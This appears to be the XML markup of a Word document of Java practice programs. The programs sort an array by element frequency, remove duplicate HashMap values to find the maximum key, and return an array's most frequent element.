        <w:t>Output - 9,9,9,6,6,1,2</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08798F02" w14:textId="6FEC37E5" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1646482B"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p>
    <w:p w14:paraId="214B4EAC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6115E709"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ortByFrequency</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04D3A35"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DBED959"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ethod to sort the array by the frequency of elements in decreasing order</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2DA4F9DC"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ortByFrequency</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D122E30"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e a HashMap to store the frequency of each element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2D82A2EF"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frequency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p>
    <w:p w14:paraId="07B166D8"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3BC332E7"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ount the frequency of each element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4A8497DE"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BC2F238"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frequency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requency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OrDefaul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60D32EA0"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0B099A0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="32025F60"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onvert the map entries to a list</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2011ADF5"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Entry</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gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> entryLis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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;(</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>frequency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ntrySet</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="614B5FCD"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23A72679"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ort the list by value (frequency) in descending order, and by key in ascending order if frequencies are equal</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5E7BB21E"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entry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or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ntry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ntry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A6D11A6"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freqCompariso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mpar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ntry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Valu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ntry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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="554AE498"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freqCompariso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5308C83"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mpar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ntry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Ke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ntry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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="228B49A5"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495006E"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freqComparison</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="733E4C5B"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8043B71"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1569259C"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Rebuild the sorted array based on the sorted entries</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DD4970D"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sortedLis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List</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5FB3D591"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Entry</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entr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ntry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11501A8"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ent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Valu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DED45AC"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sortedLis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nt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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4296C7CD"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D7BE81A"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584051E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34C4F0F1"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onvert the sorted list back to an array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="025C2B5D"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ortedArra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orted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ize</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>()];</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="24F85226"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sorted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iz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5743A98"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sortedArr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ortedLis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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="36F8D24E"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2A8C232"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1F2EB30F"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sortedArray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5D981773"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EC86ED2"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5A50322C"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ethod to print the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="51A1B18D"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printArray</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32559D2"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AF3A0D6"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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F6DF986"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90A63F7"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p>
    <w:p w14:paraId="1EA9F637"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9575CA4"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2789F66B"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2BF1DA4"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nput array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="28E11451"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9</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6</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9</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6</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9</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5DD52517"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54FCD000"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ort the array based on frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01C47861"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ortedArra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ortByFrequenc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rr</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="694AD5B0"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="76F4A078"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int the sorted array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="21BD2324"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orted Array: "</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6FF9E62E"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printArr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ortedArray</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="61006533" w14:textId="77777777" w:rsidR="00C31389" w:rsidRPr="00CE4B95"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392D74F" w14:textId="39BC34F2" w:rsidR="0015412A" w:rsidRPr="00CE4B95" w:rsidRDefault="00C31389" w:rsidP="002030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17998CDF" w14:textId="77777777" w:rsidR="0015412A" w:rsidRPr="00CE4B95" w:rsidRDefault="0015412A" w:rsidP="0015412A">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1D3C81C5" w14:textId="62C28C66" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00550E5B">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="338" w:name="_Toc196307818"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00550E5B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="00365265" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00550E5B" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>emove the duplicate values from HashMap and return the max key from the HashMap.</w:t>
      </w:r>
      <w:bookmarkEnd w:id="338"/>
    </w:p>
    <w:p w14:paraId="1E991EA6" w14:textId="63FE7254" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="093ABF00"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p>
    <w:p w14:paraId="2DBE1641"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="706886C1"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emoveDuplicatesAndFindMaxKey</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506922F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1823053F"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ethod to remove duplicate values and return the maximum key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="128CF238"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removeDuplicatesAndGetMaxKey</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43507E4"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tep 1: Remove duplicate values using a new map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="417C7C7C"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uniqueValues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p>
    <w:p w14:paraId="5FC085E6"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77DDB51F"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terate through the original map</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0F7A6E09"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Entry</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entr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ntryS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6DC07D7"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f the value is not already in the new map, add it</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2225A244"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niqueValues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ntainsValu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nt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Valu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8CED868"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uniqueValues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nt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Ke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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5250CF1E"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1269ABA"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10A8978"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4C488767"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tep 2: Find the key with the maximum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="157F5250"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maxKe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IN_VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50857D03"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maxValu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IN_VALUE</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>;</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2C19AD8A"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70234B9D"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Entry</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entr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uniqueValues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ntryS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518C6FD"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nt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Valu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maxValu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296A29C"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maxValu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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="17E93E8C"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maxKe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nt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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6A114EB5"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5056B64"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BF5BBEA"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0D36B8A8"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maxKe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Return the key corresponding to the maximum value</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0756C4CD"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6C88FB1"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="773D3B03"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ethod to print the HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="030DC766"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printMap</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2A73759"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Entry</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entr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ntryS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4031A04"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Key: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nt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Ke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Value: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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2609DD47"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37AADC1"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468B175"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F6CC85E"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B4FA985"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nput HashMap</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7A273864"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p>
    <w:p w14:paraId="4DAB55CE"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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="410794E1"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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5AE75BCC"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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="78B975B3"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4</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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7DE55700"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0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62478852"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6D458C3A"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Original HashMap:"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20217021"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prin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p>
    <w:p w14:paraId="3DD75A8F"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="09B9FF1D"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Remove duplicates and get the maximum key</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F7CA2DF"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maxKe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emoveDuplicatesAndGetMaxKe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p>
    <w:p w14:paraId="2B812CB7"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Key with the maximum value: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axKey</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="159D2AF2" w14:textId="77777777" w:rsidR="008776E1" w:rsidRPr="00CE4B95"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85C84F4" w14:textId="70AF5F15" w:rsidR="00550E5B" w:rsidRPr="00CE4B95" w:rsidRDefault="008776E1" w:rsidP="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5EBCA09D" w14:textId="77777777" w:rsidR="00550E5B" w:rsidRPr="00CE4B95" w:rsidRDefault="00550E5B" w:rsidP="00550E5B">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3155544B" w14:textId="53CC8E48" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="00904D46">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:jc w:val="both"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="339" w:name="_Toc196307819"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>Program</w:t>
      </w:r>
      <w:r w:rsidR="00904D46" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t xml:space="preserve"> - </w:t>
      </w:r>
      <w:r w:rsidR="005B473E" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>R</w:t>
      </w:r>
      <w:r w:rsidR="00904D46" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>eturn the maximum occurrence element from the array?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="339"/>
    </w:p>
    <w:p w14:paraId="5AFDF208" w14:textId="77777777" w:rsidR="001576F0" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Problem Definition: </w:t>
      </w:r>
      <w:r w:rsidR="001576F0" w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Write a program to return the maximum occurrence element from the array?</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5B3AFC5D" w14:textId="0AE38353" w:rsidR="001576F0" w:rsidRPr="00CE4B95" w:rsidRDefault="001576F0" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="1800" w:firstLine="360"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Input: int[] arr = {1,5,3,5,6,5};</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="318F95B1" w14:textId="5531AE90" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="001576F0" w:rsidP="001576F0">
      <w:pPr>
        <w:ind w:left="1440" w:firstLine="720"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Output: 5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6C6E75F9" w14:textId="6887E3E5" w:rsidR="00EA2925" w:rsidRPr="00CE4B95" w:rsidRDefault="00EA2925">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="2F5496" w:themeColor="accent1" w:themeShade="BF"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="3DF7272E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4DA6EF05"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="182C6E75"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B963799"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xOccurrenc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CDFD228"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="418E1FD3"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ethod to return the maximum occurrence element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0467AC96"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findMaxOccurrence</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8549C2F"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e a HashMap to store the frequency of each element</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="00F87891"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frequency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p>
    <w:p w14:paraId="5735FCB6"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4D2CA823"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ount the frequency of each element in the array</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="453B19BC"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7572508"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frequency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requency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OrDefaul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35344E51"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2AD4BEC"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3D46760D"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Variables to track the element with the maximum frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="532B97FB"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maxEleme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4A72480F"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maxCou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1D43330E"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w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="360A5E21"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terate over the map to find the element with the highest frequency</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46C9DAC0"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Entry</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entr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requency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ntryS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8D9CB85"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nt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Valu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maxCou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6618A00"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maxCou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nt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Value</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="46F8164A"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maxEleme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nt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Key</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
